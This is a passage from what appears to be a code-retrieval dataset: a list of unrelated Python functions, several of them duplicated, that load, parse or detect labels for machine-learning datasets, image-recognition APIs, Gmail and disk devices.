{path}\")\n return None\n return np.load(path, allow_pickle=True).tolist()", "def _load_labels(self, label_path: str) -> List[str]:\n with open(label_path, 'r') as f:\n return [line.strip() for _, line in enumerate(f.readlines())]", "def load_labels(path):\n with open(path, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n labels = {}\n for row_number, content in enumerate(lines):\n pair = re.split(r'[:\\s]+', content.strip(), maxsplit=1)\n if len(pair) == 2 and pair[0].strip().isdigit():\n labels[int(pair[0])] = pair[1].strip()\n else:\n labels[row_number] = pair[0].strip()\n return labels", "def get_image_path_label(all_paths):\r\n n_folders_int = random.sample(range(0, len(all_paths)), n_way)\r\n image_labels = [[(glob.glob(all_paths[n] + '\\*')[k], n) # (path, label)\r\n for n in n_folders_int\r\n for k in random.sample(range(0, len(glob.glob(all_paths[n] + '\\*'))), k_shot+1)\r\n ] for b in range(batch_size)] \r\n return image_labels", "def vision_api_label_detection(uri):\n\n\tpayload = {\n\t\t\"requests\": [\n\t\t\t{\n\t\t\t\t\"image\": {\n\t\t\t\t\t\"source\": {\n\t\t\t\t\t\t\"image_uri\": uri\n\t\t\t\t\t}\n\t\t\t\t},\n\t\t\t\t\"features\": [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"type\": \"LABEL_DETECTION\"\n\t\t\t\t\t}\n\t\t\t\t]\n\t\t\t}\n\t\t]\n\t}\n\n\tresponse = fetch(\n\t\t\"https://vision.googleapis.com/v1/images:annotate?key=\" + api_key,\n\t\tmethod=POST,\n\t\tpayload=dumps(payload),\n\t\theaders={\"Content-Type\": \"application/json\"}\n\t)\n\tresult = loads(response.content)\n\n\t#return len(result[\"responses\"][0])\n\n\tif (len(result[\"responses\"][0]) == 0):\n\t\treturn []\n\telse:\n\t\ttry:\n\t\t\ttop_5_labels = []\n\t\t\ti = 0\n\t\t\tfor label in result[\"responses\"][0][\"labelAnnotations\"]:\n\t\t\t\ttop_5_labels.append(label[\"description\"])\n\t\t\t\ti += 1\n\t\t\t\tif (i == 5):\n\t\t\t\t\tbreak\n\t\t\treturn set(top_5_labels)\n\t\texcept:\n\t\t\treturn []", "def detect_labels_uri(uri):\n client = vision.ImageAnnotatorClient()\n image = types.Image()\n image.source.image_uri = uri\n macy_keywords = []\n #print(dir(client))\n response_label = client.label_detection(image=image)\n response_web = client.web_detection(image=image)\n labels = response_label.label_annotations\n web_annotations = response_web.web_detection\n\n #print(dir(response_web))\n #print((dir(labels)))\n print('Labels:')\n\n for label in labels:\n print (label.description)\n if label.description in clw:\n print(label)\n macy_keywords.append(label.description)\n #for annotation in web_annotations():\n #print (annotation)\n\n for web_entity in web_annotations.web_entities:\n print (web_entity.description)\n if any(word in web_entity.description.lower() for word in clw):\n print(web_entity)\n macy_keywords.append(web_entity.description.lower())\n\n print set(macy_keywords)\n get_macy_links(set(macy_keywords))", "def _FindLabels(self):\n texs = \" \".join(glob.glob(\"*.tex\"))\n cat_process = subprocess.Popen(shlex.split(\"cat %s\" % texs),\n stdout=subprocess.PIPE)\n grep_process = subprocess.Popen(shlex.split(r\"grep \\\\\\\\label\"),\n stdin=cat_process.stdout,\n stdout=subprocess.PIPE)\n cat_process.stdout.close()\n\n lines = grep_process.communicate()[0]\n\n ret = []\n for label in lines.split(\"\\n\"):\n ret.append(responses.BuildCompletionData(\n re.sub(r\".*\\label{(.*)}.*\", r\"\\1\", label)\n )\n )\n\n return ret", "def identify(self, scores, word_seq, path):\n n = len(word_seq) - 1\n (prob, state) = max((scores[n][label], label) for label in self.label_type_map)\n return path[state]", "def _AreLabelsPaths(self):\n\n return self.label_class == \"file_label.FileLabel\"", "def read_label_from_txt(label_path):\n text = np.fromfile(label_path)\n bounding_box = []\n with open(label_path, \"r\") as f:\n labels = f.read().split(\"\\n\")\n for label in labels:\n if not label:\n continue\n label = label.split(\" \")\n if (label[0] == \"DontCare\"):\n continue\n\n if label[0] == (\"Car\" or \"Van\"): # or \"Truck\"\n bounding_box.append(label[8:15])\n\n if bounding_box:\n data = np.array(bounding_box, dtype=np.float32)\n return data[:, 3:6], data[:, :3], data[:, 6]\n else:\n return None, None, None", "def read_label_from_txt(label_path):\n text = np.fromfile(label_path)\n bounding_box = []\n with open(label_path, \"r\") as f:\n labels = f.read().split(\"\\n\")\n for label in labels:\n if not label:\n continue\n label = label.split(\" \")\n if (label[0] == \"DontCare\"):\n continue\n\n if label[0] == (\"Car\" or \"Van\"): # or \"Truck\"\n bounding_box.append(label[8:15])\n\n if bounding_box:\n data = np.array(bounding_box, dtype=np.float32)\n return data[:, 3:6], data[:, :3], data[:, 6]\n else:\n return None, None, None", "def load_labels(path):\n with open(path, \"r\", encoding=\"utf-8\") as f:\n lines = f.readlines()\n labels = {}\n for row_number, content in enumerate(lines):\n pair = re.split(r\"[:\\s]+\", content.strip(), maxsplit=1)\n if len(pair) == 2 and pair[0].strip().isdigit():\n labels[int(pair[0])] = pair[1].strip()\n else:\n labels[row_number] = pair[0].strip()\n # print(labels)\n return labels", "def compute_labels(path_list):\n labels = []\n videos = []\n for i, path in enumerate(path_list):\n X = read_labels(path)\n for sample in X:\n labels.append(sample[1])\n if i == 0:\n videos.append(sample[0])\n\n labels = np.array(labels).reshape(len(path_list), -1).T\n \n labels_avg = np.average(labels, 1).round()\n labels_med = np.median(labels, 1)\n return labels_med, labels_avg, videos", "def get_output(path, label_file = None):\n img_id = path.split('/')[-1]\n labels = label_file.loc[img_id].values\n return labels", "def load_imgsLabels(self, image_paths):\n \n# label = image_paths[-1]\n \n images = self.load_images(image_paths)\n \n images = self.resize_images(images)\n \n images_list = self.greyscale_images(images)\n\n return images_list", "def load_labels():\n filename = os.path.join(config['inference']['model_dir'], 'output_labels.txt')\n global labels\n labels = [line.rstrip() for line in tf.gfile.FastGFile(filename)]", "def get_labels():\n return if_found(dao.get_labels())", "def _get_img_label(self, path):\n food_items = self.annotations[path]\n tomato_items = [\n item for item in food_items\n if item['id'] in self.tomato_label_ids\n ]\n return 1 if len(tomato_items) > 0 else 0", "def load_from_path(self, paths, label_key='labels'):\n data = []\n labels = []\n for path in paths:\n with tf.io.gfile.GFile(path, 'rb') as f:\n d = {\n k.decode('utf8'): v\n for k, v in cPickle.load(f, encoding='bytes').items()\n }\n data.append(d['data'])\n labels.append(d[label_key])\n data = np.concatenate(data, axis=0)\n data = data.reshape((data.shape[0], 3, 32, 32))\n labels = np.concatenate(labels, axis=0)\n labels = np.reshape(labels, (len(labels), 1))\n\n if tf.keras.backend.image_data_format() == 'channels_last':\n data = data.transpose(0, 2, 3, 1)\n\n return data, labels", "def read_label_map(path):\n with tf.io.gfile.GFile(path) as f:\n if path.endswith('.json'):\n return json.load(f)\n else:\n label_map = {}\n empty_line_encountered = False\n for tag in f:\n tag = tag.strip()\n if tag:\n label_map[tag] = len(label_map)\n else:\n if empty_line_encountered:\n raise ValueError(\n 'There should be no empty lines in the middle of the label map '\n 'file.'\n )\n empty_line_encountered = True\n return label_map", "def classifyFile(self, path):\n # Gets extension of file from path\n name, ext = filename, file_extension = os.path.splitext(path)\n fileName = os.path.basename(path)\n\n # Look for all keywords in path\n for classification in self.outPaths:\n keywords = self.outPaths[classification][\"keywords\"]\n if [ele for ele in keywords if(ele in fileName)]:\n return (classification)\n#\n\n # Look for all extension patterns in path\n for classification in self.outPaths:\n if (ext in [x.replace(\"*\", \"\") for x in self.outPaths[classification][\"pattern\"]]):\n # Return classification if found\n return (classification)\n\n # If no classification is found return\n return None", "def get_label(img_path):\n img_name = img_path.stem\n label_name = img_name + \".txt\"\n label_path = img_path.parent / label_name\n with open(label_path) as f:\n label = json.load(f)\n return label", "def get_label_counts(dataset_path: str):\n if not dataset_path:\n return None\n td = ImageFolder(root=dataset_path)\n # get label distribution\n label_counts = [0] * len(td.classes)\n for p, l in td.samples:\n label_counts[l] += 1\n return label_counts", "def load_labels(path):\n with open(path, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n labels = []\n for row_number, content in enumerate(lines):\n pair = re.split(r'[:\\s]+', content.strip(), maxsplit=1)\n #if len(pair) == 2 and pair[0].strip().isdigit():\n labels.append(np.array([int(pair[0].strip()),pair[1].strip()]))\n #else:\n # labels.append(pair[0].strip())\n return np.array(labels)", "def get_labels():\n return [name for name in os.listdir(os.getcwd() + '/assets/images') if name != 'test']", "def __read_image_paths_labels(self, annotations_csv_path):\n\n # intialize some list objects\n\n \n temp_df = pd.read_csv(annotations_csv_path, index_col=[0])\n labels = temp_df.drop('Path', axis=1).values\n image_paths = temp_df['Path'].tolist()\n\n return image_paths, labels", "def detect_labels(img: np.ndarray):\n \n # Create a range of allowed colors.\n lower_color = np.array([20, 50, 0])\n upper_color = np.array([255, 255, 255])\n\n # Keep the pixels that lie within the range.\n color_filtered = cv.inRange(\n cv.cvtColor(img, cv.COLOR_RGB2HSV),\n lower_color,\n upper_color\n )\n \n # Keeping only the really bright pixels (converted to 255), change the dull ones to 0.\n # Helps distinguish the labels from other dull colors.\n _, thresholded = cv.threshold(color_filtered, 254, 255, cv.THRESH_BINARY)\n\n # Reduce the thickness of regions. Every 30x30 sliding window of 255 in the image gets replaced by a white pixel.\n # The stronger the erosion, the more the noise is removed, with a chance of removal of good pixels as well.\n eroded = cv.erode(thresholded, np.ones((30, 30)))\n\n # Now find outlines of the bright regions that remain after the thickness reduction.\n contours, _ = cv.findContours(eroded, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n \n # Identify the contours that represent our labels.\n # Gotta be the two largest ones in terms of area.\n contour_areas = [(cv.contourArea(c), idx) for (idx, c) in enumerate(contours)]\n\n contour_largest_idx = max(contour_areas)[1]\n contour_second_largest_idx = max(filter(lambda item: item[1] != contour_largest_idx, contour_areas))[1]\n\n # Since the labels are sorta rectangular, find the mean of the contours' y-axes to approximate the vertical center of the labels.\n largest_vertical_center = np.mean(contours[contour_largest_idx][:, :, 1])\n second_largest_vertical_center = np.mean(contours[contour_second_largest_idx][:, :, 1])\n\n # Higher center implies the value is more towards the bottom of the image, and hence the vertical center of the bottom label.\n bottom_label = min(largest_vertical_center, second_largest_vertical_center)\n \n # Lower center implies the value is more towards the top of the image, and hence the vertical center of the top label.\n top_label = max(largest_vertical_center, second_largest_vertical_center)\n\n return bottom_label, top_label", "def test_text_classifier_get_labels(self):\n pass", "def get_base_image_from_labels(user_disk):\n\n labels = ['cf_version', 'branch', 'target', 'build_id']\n disk_labels = user_disk.extra['labels']\n\n if all(label in disk_labels for label in labels):\n cf_version = disk_labels['cf_version']\n branch = disk_labels['branch']\n target = disk_labels['target']\n build_id = disk_labels['build_id']\n\n base_image = f'halyard-{cf_version}-{branch}-{target}-{build_id}'\n return base_image\n else:\n utils.fatal_error(f'Labels for {user_disk.name} are not complete.\\n \\\n Must have all labels in: {labels}')", "def detect_rk_labels(image, img_size, s3bucket):\n\n accepted_image_types = ['jpg', 'JPG', 'png', 'PNG']\n rekognition_img_size_limit = 15 * 1024 * 1024\n\n try:\n if str(image).split('/')[-1].split('.')[-1] in accepted_image_types \\\n and float(img_size) < rekognition_img_size_limit:\n\n rk_client = boto3.client('rekognition', region_name=AWS_REGION)\n\n labels = []\n\n resp = rk_client.detect_labels(\n Image={\n 'S3Object': {\n 'Bucket': s3bucket,\n 'Name': image,\n },\n },\n MaxLabels=5,\n MinConfidence=80,\n )\n\n for i_list in resp['Labels']:\n labels.append({'Name': i_list['Name'], 'Confidence': int(i_list['Confidence'])})\n\n return labels\n else:\n print(\"Labels detection skipped for {} because of service constraints violation\".format(image))\n\n except Exception as e:\n print(\"Rekognition labels detection skipped because of the following error: \", e)\n pass", "def labels_for_training_data():\n current_id = 0\n label_ids = dict()\n faces, faces_ids = list(), list()\n\n # Go through directories and find label and path to image\n for root, dirs, files in walk('data/'):\n for file in files:\n if file.endswith('.jpg') or file.endswith('.png'):\n img_path = path.join(root, file)\n label = path.basename(root).replace(' ', '-').lower()\n if label not in label_ids:\n label_ids[label] = current_id\n current_id += 1\n id_ = label_ids[label]\n\n test_img = cv2.imread(img_path)\n test_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY)\n if test_img is None:\n print('Image not loaded properly')\n continue\n\n faces.append(test_img)\n faces_ids.append(id_)\n\n # Make directory with labels doesn't exist make directory and file with labels\n if not path.exists('labels/'):\n makedirs('labels/')\n with open('labels/face-labels.pickle', 'wb') as file:\n pickle.dump(label_ids, file)\n\n return faces, faces_ids", "def getImageLabels(bucket, key):\n client = boto3.client('rekognition')\n resp = client.detect_labels(\n Image={\n 'S3Object': {\n 'Bucket': bucket,\n 'Name': key\n }\n }\n )\n\n output = []\n # I'm assuming that we only need the name labels to return to the customer. \n for label in resp['Labels']:\n output.append(label['Name'])\n return output", "def load_labels(source_dir, label_pattern):\r\n\r\n logging.info(\"Loading labels from %s with pattern %s\"\r\n % (source_dir, label_pattern))\r\n label_files = glob(path.join(source_dir, label_pattern))\r\n if len(label_files) == 0:\r\n raise ValueError(\"No label files found with pattern %s\"\r\n % label_pattern)\r\n if len(label_files) > 1:\r\n raise ValueError(\"Only one label file supported ATM.\")\r\n labels = np.load(label_files[0]).flatten()\r\n logging.info(\"Label loading complete. Shape is %r\" % (labels.shape,))\r\n return labels", "def _read_labels(test_data=False):\n if not test_data:\n filename = os.path.join(FOLDER_PATH, 'train-labels.idx1-ubyte')\n else:\n filename = os.path.join(FOLDER_PATH, 't10k-labels.idx1-ubyte')\n if not os.path.exists(filename):\n raise ValueError('The file dose not exist.')\n \n # Create a queue that produces the filenames to read.\n filename_queue = tf.train.string_input_producer([filename])\n \n # The first 8 bytes contain file information:\n # [offset] [type] [value] [description]\n # 0000 32 bit integer 0x00000801(2049) magic number\n # 0004 32 bit integer 60000/10000 number of items \n # ...(label value)\n header_bytes = 8\n # Every record consists of a label, with a fixed number of bytes for each.\n record_bytes = 1\n \n # Create a FixedLengthRecordReader to read record.\n reader = tf.FixedLengthRecordReader(record_bytes=record_bytes,\n header_bytes=header_bytes)\n _, value = reader.read(filename_queue)\n\n # Convert from a string to a vector of uint8, then cast to int32.\n record = tf.cast(tf.decode_raw(value, tf.uint8), tf.int32)\n \n # Reshape from [1] to a scalar shape [].\n label = tf.reshape(record, [])\n\n return label", "def subbrick_labels_of(path_to_afni_dataset) -> List[str]:\n dataset = nibabel.load(path_to_afni_dataset)\n raw_label_string = dataset.header.info['BRICK_LABS']\n labels = raw_label_string.split(\"~\")\n\n return labels", "def get_label_files(path, ext=\".txt\"):\n return get_files(path, ext)", "def get_labels(fasta_file):\n\t\tbase_name = basename(fasta_file)\n\t\tname = splitext(base_name)[0]\n\t\tlabel = name.split(\"_\")[-1]\n\t\tassert label == \"pos\" or label == \"hard\", \"AssertionError: label {} not found, possible labels pos, hard.\"\n\t\tif label == \"pos\":\n\t\t\treturn \"Toxin\"\n\t\telif label == \"hard\":\n\t\t\treturn \"No_toxin\"", "async def test__get_labels():\n # Uppercase 'C'\n assert ImageConfig._get_labels(json.loads('{\"Config\":{\"Labels\":{\"x\":\"5\"}}}')) == {\n \"x\": \"5\"\n }\n\n # Lowercase 'C'\n assert ImageConfig._get_labels(json.loads('{\"config\":{\"Labels\":{\"x\":\"5\"}}}')) == {\n \"x\": \"5\"\n }\n\n # Missing 'Labels'\n assert ImageConfig._get_labels(json.loads('{\"Config\":{}}')) == {}", "def __get_label(file_path, fruits):\n try:\n root, name, fruit, location, time, filename = r\"{}\".format(file_path).split(\"\\\\\")\n if fruit.lower() not in fruits:\n return \"Unknown fruit\"\n return fruit.lower()\n except ValueError:\n for fruit in fruits:\n if fruit in file_path.lower():\n return fruit\n\n return \"Unknown fruit\" # if we got here so we don't know what is the label", "def make_label_map(path, label_list):\r\n \r\n img = []\r\n for name in path:\r\n now = np.zeros((224,224))\r\n im = cv2.resize(cv2.imread(name), (224,224)).tolist()\r\n for y, i in enumerate(im):\r\n for x, j in enumerate(i):\r\n try:\r\n now[y, x] = label_list.index(j)\r\n\r\n except ValueError:\r\n now[y, x] = 0\r\n\r\n img.append(now)\r\n return img", "def load_labels(filename):\n return [line.rstrip() for line in tf.gfile.GFile(filename)]", "def load_labels(filename):\n return [line.rstrip() for line in tf.gfile.GFile(filename)]", "def count_labels(labels_path):\n counts = np.zeros(4)\n with open(labels_path, 'r') as f:\n for line in f:\n line = int(line.split()[1]) - 1\n counts[line] += 1\n\n return counts", "def load_labels(filename):\n return [line.rstrip() for line in tf.gfile.GFile(filename)]", "def label_names_file():\n return tfds.core.tfds_path(_LABELS_FNAME)", "def get_validation_labels(val_path):\n labels_path = tfds.core.tfds_path(_VALIDATION_LABELS_FNAME)\n with tf.io.gfile.GFile(os.fspath(labels_path)) as labels_f:\n # `splitlines` to remove trailing `\\r` in Windows\n labels = labels_f.read().strip().splitlines()\n with tf.io.gfile.GFile(val_path, 'rb') as tar_f_obj:\n tar = tarfile.open(mode='r:', fileobj=tar_f_obj)\n images = sorted(tar.getnames())\n return dict(zip(images, labels))", "def storing_labels (self, fpath_geojson):\n \n labels_df = gpd.read_file (fpath_geojson)\n print(\"Size and shape of the labels dataset are: {}\".format(labels_df.shape))\n return labels_df", "def _get_images_and_labels(self, path: str, user_id: int):\n\n image_paths = [os.path.join(path, f) for f in os.listdir(path)]\n face_samples = []\n ids = []\n\n for imagePath in image_paths:\n\n pil_image = Image.open(imagePath).convert('L') # convert it to grayscale\n img_numpy = np.array(pil_image, 'uint8')\n\n faces = self.detector.detectMultiScale(img_numpy)\n\n for (x, y, w, h) in faces:\n face_samples.append(img_numpy[y:y + h, x:x + w])\n ids.append(user_id)\n\n return face_samples, ids", "def is_gcs_path(path):\n return GCS_REGEX.match(path)", "def parse_labelfile(path):\n with open(path, \"r\") as FILE:\n lines = FILE.readlines()\n\n\n labels = {x.split(\":\")[0]: x.split(\":\")[1] for x in lines[1:]}\n\n for key in labels:\n labels[key] = np.array(labels[key].split(\",\")).astype(\"uint8\")\n\n return labels", "def detect(self, path):\n valid = False\n path = pathlib.Path(path)\n # basic check for suffix\n try:\n if path.suffix == self.suffix:\n valid = True\n except ValueError:\n pass\n\n # advanced check with \"detect\"\n if valid and \"detect\" in self.recipe:\n fdetect = self.recipe[\"detect\"]\n valid = fdetect(path)\n\n return valid", "def _GetLabels(self, directory, scan_subdirs, label, predicate):\n\n labels = []\n\n # Go through all of the files (and subdirectories) in that\n # directory.\n for entry in dircache.listdir(directory):\n entry_label = self._GetLabelFromBasename(entry)\n # If the label is not valid then pretend it\n # does not exist. It would not be valid to create an entity\n # with such an id.\n if not self.IsValidLabel(entry_label):\n continue\n # Compute the full path to 'entry'.\n entry_path = os.path.join(directory, entry)\n # If it satisfies the 'predicate', add it to the list.\n if predicate(entry_path):\n labels.append(self.JoinLabels(label, entry_label))\n # If it is a subdirectory, recurse.\n if (scan_subdirs and os.path.isdir(entry_path)\n and self._IsSuiteFile(entry_path)):\n labels.extend(self._GetLabels(entry_path,\n scan_subdirs,\n self.JoinLabels(label, \n entry_label),\n predicate))\n\n return labels", "def get_label_vocab(*paths: str) -> Dict[str, int]:\n label_set = set()\n for path in paths:\n with open(path) as r:\n for line in r:\n instance = json.loads(line)\n for annotation in instance['annotations']:\n label_set.update(annotation['labels'])\n return {label: idx for idx, label in enumerate(label_set)}", "def test_label():\n label_path = pjoin(data_path, \"label\", \"lh.BA1.label\")\n label = read_label(label_path)\n # XXX : test more\n assert_true(np.all(label > 0))", "def load_labeled_data():\n\n images = []\n labels = []\n\n for i in range(1, 10):\n path = (\"selflabeled\", str(i), \"*.jpg\")\n filenames = glob.glob(\"/\".join(path))\n images_one_type = [cv2.imread(img) for img in filenames]\n labels_one_type = [i] * len(images_one_type)\n images += images_one_type\n labels += labels_one_type\n\n return images, labels", "def read_labels(labels_file):\n if not labels_file:\n print 'WARNING: No labels file provided. Results will be difficult to interpret.'\n return None\n\n labels = []\n with open(labels_file) as infile:\n for line in infile:\n label = line.strip()\n if label:\n labels.append(label)\n assert len(labels), 'No labels found'\n return labels", "def read_labels(label_path, label_type, calib_path=None, is_velo_cam=False, proj_velo=None):\n if label_type == \"txt\": #TODO\n places, size, rotates = read_label_from_txt(label_path)\n if places is None:\n return None, None, None\n rotates = np.pi / 2 - rotates\n dummy = np.zeros_like(places)\n dummy = places.copy()\n if calib_path:\n places = np.dot(dummy, proj_velo.transpose())[:, :3]\n else:\n places = dummy\n if is_velo_cam:\n places[:, 0] += 0.27\n\n elif label_type == \"xml\":\n bounding_boxes, size = read_label_from_xml(label_path)\n places = bounding_boxes[30][\"place\"]\n rotates = bounding_boxes[30][\"rotate\"][:, 2]\n size = bounding_boxes[30][\"size\"]\n\n return places, rotates, size", "def read_labels(label_path, label_type, calib_path=None, is_velo_cam=False, proj_velo=None):\n if label_type == \"txt\": #TODO\n places, size, rotates = read_label_from_txt(label_path)\n if places is None:\n return None, None, None\n rotates = np.pi / 2 - rotates\n dummy = np.zeros_like(places)\n dummy = places.copy()\n if calib_path:\n places = np.dot(dummy, proj_velo.transpose())[:, :3]\n else:\n places = dummy\n if is_velo_cam:\n places[:, 0] += 0.27\n\n elif label_type == \"xml\":\n bounding_boxes, size = read_label_from_xml(label_path)\n places = bounding_boxes[30][\"place\"]\n rotates = bounding_boxes[30][\"rotate\"][:, 2]\n size = bounding_boxes[30][\"size\"]\n\n return places, rotates, size", "def sort_have_labels(doc_cloud_id):\n filename = SETTINGS.LABELED_LOCATION + \"/\" + doc_cloud_id\n if os.path.isfile(filename):\n return 0\n return 1", "def _findfile(self,path,label):\n files=[];filenames=os.listdir(path)\n for name in filenames:\n if os.path.splitext(name)[0]==str(label):\n files.append(name)\n return files", "def _read_labels_csv_file(self, csv_file_path, image_file_paths):\n\n self.__logger.debug('[Get Labels]')\n self.__logger.debug('Read CSV Labels ( %s ) ...' % csv_file_path)\n\n image_file_names = self.get_file_names_from_file_paths(file_paths=image_file_paths)\n\n labels = []\n\n with open(csv_file_path, newline='') as csvfile:\n read_image_files = 0 # numbers of image files read\n rows = csv.reader(csvfile)\n\n for row in rows:\n file_name = row[0]\n # make file name from '00030183_004.png' to '00030183_004'\n file_name = file_name.split('.')\n file_name = file_name[0]\n\n # if csv file name matches image file name, the label of the former will be stored in labels (list)\n if file_name == image_file_names[read_image_files]: # image_file_name has to remove str '.jpg'\n label = row[1].split('|')\n label_id = []\n for i in range(len(label)):\n label_id.append(Xray_class_id[label[i]])\n labels.append(label_id) # store the label\n\n read_image_files += 1\n if read_image_files == len(image_file_names): # if numbers of image files read equals numbers of\n # batch images, then break\n break\n\n self.__logger.debug('Done !')\n\n return labels", "def cifar100(path, label_mode='fine'):\n def _load_batch(filepath, label_key):\n with open(filepath, 'rb') as f:\n if sys.version_info < (3,):\n d = cPickle.load(f)\n else:\n d = cPickle.load(f, encoding='bytes')\n d_decoded = {} # decode utf8\n for k, v in six.iteritems(d):\n d_decoded[k.decode('utf8')] = v\n d = d_decoded\n images = d['data']\n labels = d[label_key]\n images = images.reshape(images.shape[0], 3, 32, 32)\n labels = np.reshape(labels, len(labels,))\n return images, labels\n path = os.path.expanduser(path)\n directory = 'cifar-100-python'\n if not os.path.exists(os.path.join(path, directory)):\n url = 'http://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz'\n maybe_download_and_extract(path, url)\n\n filepath = os.path.join(path, directory, 'train')\n x_train, y_train = _load_batch(filepath, label_mode + '_labels')\n\n filepath = os.path.join(path, directory, 'test')\n x_test, y_test = _load_batch(filepath, label_mode + '_labels')\n return (x_train, y_train), (x_test, y_test)", "def get_labels(train_f_path):\n results = []\n with open(train_f_path, 'r') as f:\n for line in f:\n n_line = line.strip()\n if n_line:\n results.append(n_line.split()[0])\n return results", "def read_labels(labels_path):\n with open(labels_path, 'r') as file:\n data = file.read()\n data = data.split()\n data = np.array(data)\n data = np.reshape(data, (-1, 2))\n return data", "def test_intent_classifier_get_labels(self):\n pass", "def read_stanford_labels():\n # First get the hardi data\n fetch_stanford_hardi()\n hard_img, gtab = read_stanford_hardi()\n\n # Fetch and load\n files, folder = fetch_stanford_labels()\n labels_file = pjoin(folder, \"aparc-reduced.nii.gz\")\n labels_img = nib.load(labels_file)\n return hard_img, gtab, labels_img", "def get_disk_labels(self):\n path = '/dev/disk/by-label/'\n labels = {}\n if not os.path.isdir(path):\n return labels\n\n for label in os.listdir(path):\n label = label.replace('\\\\x2f', '/')\n device = os.path.realpath(path + '/' + label)\n labels[device] = label\n\n return labels", "def extract_labels(filename,tag,one_hot):\n print('Extracting labels',filename)\n return extractdb_labels(filename,tag,one_hot=one_hot)", "def object_detect(filename):\n cv2.ocl.setUseOpenCL(False)\n just_fname = filename.split(\".\")[0]\n image = cv2.imread('./static/uploads/' + filename)\n bbox, label, conf = cv.detect_common_objects(image)\n output_image = draw_bbox(image, bbox, label, conf)\n plt.imshow(output_image)\n plt.savefig(os.path.join('./static/output/', just_fname + '.png'))\n d = Counter(label)\n if not label:\n return \"No objects detected\"\n labelstr = \", \".join('{} {}'.format(v, k) for k, v in d.items())\n return labelstr", "def _is_label(self, words):\n if words[0] == 'label':\n if len(words) != 2:\n raise SyntaxError(\"File line {}: Invalid number of arguments for C_LABEL command.\".format(self._file_line))\n return True\n else:\n return False", "def compute_localizations_labels(depc, loc_id_list, config=None):\n from os.path import exists, join\n\n logger.info('[ibs] Process Localization Labels')\n logger.info('config = {!r}'.format(config))\n # Get controller\n ibs = depc.controller\n\n if config['labeler_algo'] in ['pipeline', 'cnn']:\n gid_list_, gid_list, chip_list = get_localization_chips(\n ibs,\n loc_id_list,\n target_size=(128, 128),\n axis_aligned=config['labeler_axis_aligned'],\n )\n result_list = ibs.generate_chip_label_list(chip_list, **config)\n elif config['labeler_algo'] in ['azure']:\n raise NotImplementedError('Azure is not implemented for images')\n elif config['labeler_algo'] in ['densenet']:\n from wbia.algo.detect import densenet\n\n target_size = (\n densenet.INPUT_SIZE,\n densenet.INPUT_SIZE,\n )\n gid_list_, gid_list, chip_list = get_localization_chips(\n ibs,\n loc_id_list,\n target_size=target_size,\n axis_aligned=config['labeler_axis_aligned'],\n )\n config = dict(config)\n config['classifier_weight_filepath'] = config['labeler_weight_filepath']\n nonce = ut.random_nonce()[:16]\n cache_path = join(ibs.cachedir, 'localization_labels_{}'.format(nonce))\n assert not exists(cache_path)\n ut.ensuredir(cache_path)\n chip_filepath_list = []\n for index, chip in enumerate(chip_list):\n chip_filepath = join(cache_path, 'chip_%08d.png' % (index,))\n cv2.imwrite(chip_filepath, chip)\n assert exists(chip_filepath)\n chip_filepath_list.append(chip_filepath)\n result_gen = densenet.test_dict(chip_filepath_list, return_dict=True, **config)\n result_list = list(result_gen)\n ut.delete(cache_path)\n\n assert len(gid_list) == len(result_list)\n\n # Release chips\n chip_list = None\n\n # Group the results\n group_dict = {}\n for gid, result in zip(gid_list, result_list):\n if gid not in group_dict:\n group_dict[gid] = []\n group_dict[gid].append(result)\n\n # Return the results\n for gid in gid_list_:\n result_list = group_dict.get(gid, None)\n if result_list is None:\n ret_tuple = (\n np.array([]),\n np.array([]),\n np.array([]),\n np.array([]),\n np.array([]),\n [],\n )\n else:\n zipped_list = list(zip(*result_list))\n ret_tuple = (\n np.array(zipped_list[0]),\n np.array(zipped_list[1]),\n np.array(zipped_list[2]),\n np.array(zipped_list[3]),\n np.array(zipped_list[4]),\n list(zipped_list[5]),\n )\n yield ret_tuple", "def _check_for_labels(self):\n check = True\n if 'labels' not in self.mapper:\n check = False\n return check", "def get_labels():\n\n logging.info(\"Getting metadata about labels\")\n\n labels = []\n\n if len(args.labels) == 0:\n logging.warning(\"No labels specified, assuming all labels. If you have a lot of labels in your inbox you could hit API limits quickly.\")\n results = GMAIL_CLIENT.users().labels().list(userId='me').execute()\n\n labels = results.get('labels', [])\n else:\n logging.info('Using labels: %s ', args.labels)\n\n for label in args.labels:\n labels.append({'id': label})\n\n if not labels:\n logging.info('No labels found.')\n sys.exit()\n\n return labels", "def find_label(self, *args):\n return _ida_hexrays.cfunc_t_find_label(self, *args)", "def load_labels(path, encoding='utf-8'):\r\n with open(path, 'r', encoding=encoding) as f:\r\n lines = f.readlines()\r\n if not lines:\r\n return {}\r\n\r\n if lines[0].split(' ', maxsplit=1)[0].isdigit():\r\n pairs = [line.split(' ', maxsplit=1) for line in lines]\r\n return {int(index): label.strip() for index, label in pairs}\r\n else:\r\n return {index: line.strip() for index, line in enumerate(lines)}", "def detect_hotdog(image_bytes):\n try:\n response = rekognition.detect_labels(\n Image={\n 'Bytes': image_bytes,\n },\n MinConfidence=80.0\n )\n except Exception as e:\n print(e)\n print('Unable to detect labels for image.')\n raise (e)\n labels = response['Labels']\n if any(label['Name'] == 'Hot Dog' for label in labels):\n return True\n return False", "def load_labels(db_dir, patient_id, flatten=True, unzipped=False):\n if unzipped:\n flat_labels = np.load(os.path.join(db_dir, '{:05d}_batched_lbls.npz'.format(patient_id)), allow_pickle=True)\n return flat_labels\n else:\n raw_labels = load_pkl(os.path.join(db_dir, '{:05d}_batched_lbls.pkl.gz'.format(patient_id)))\n if flatten:\n flat_labels = flatten_raw_labels(raw_labels)\n return flat_labels\n else:\n return raw_labels", "def assign_labels(basename, data_folder=Path(\"/data\"), verbose=False):\n urls_path = data_folder / \"graphs\" / basename / (basename + \".urls\")\n assert urls_path.exists(), \"Urls file not found!\"\n # check if labels dict already existing\n labels_path = data_folder / \"models\" / basename / (\"labels.json\")\n if labels_path.exists():\n print(\"Labels json already existing.\")\n else:\n print(\"Building labels json..\")\n # count number of lines in file\n num_lines = sum(1 for line in urls_path.open())\n labels_array = [0] * num_lines\n with urls_path.open() as f:\n clusters_count = Counter()\n labels = dict()\n class_index = 0\n for pos, line in enumerate(tqdm(f, total=num_lines)):\n # extract the TLD\n complete_domain = tldextract.extract(line).suffix\n # we only need the country domain now\n domain = 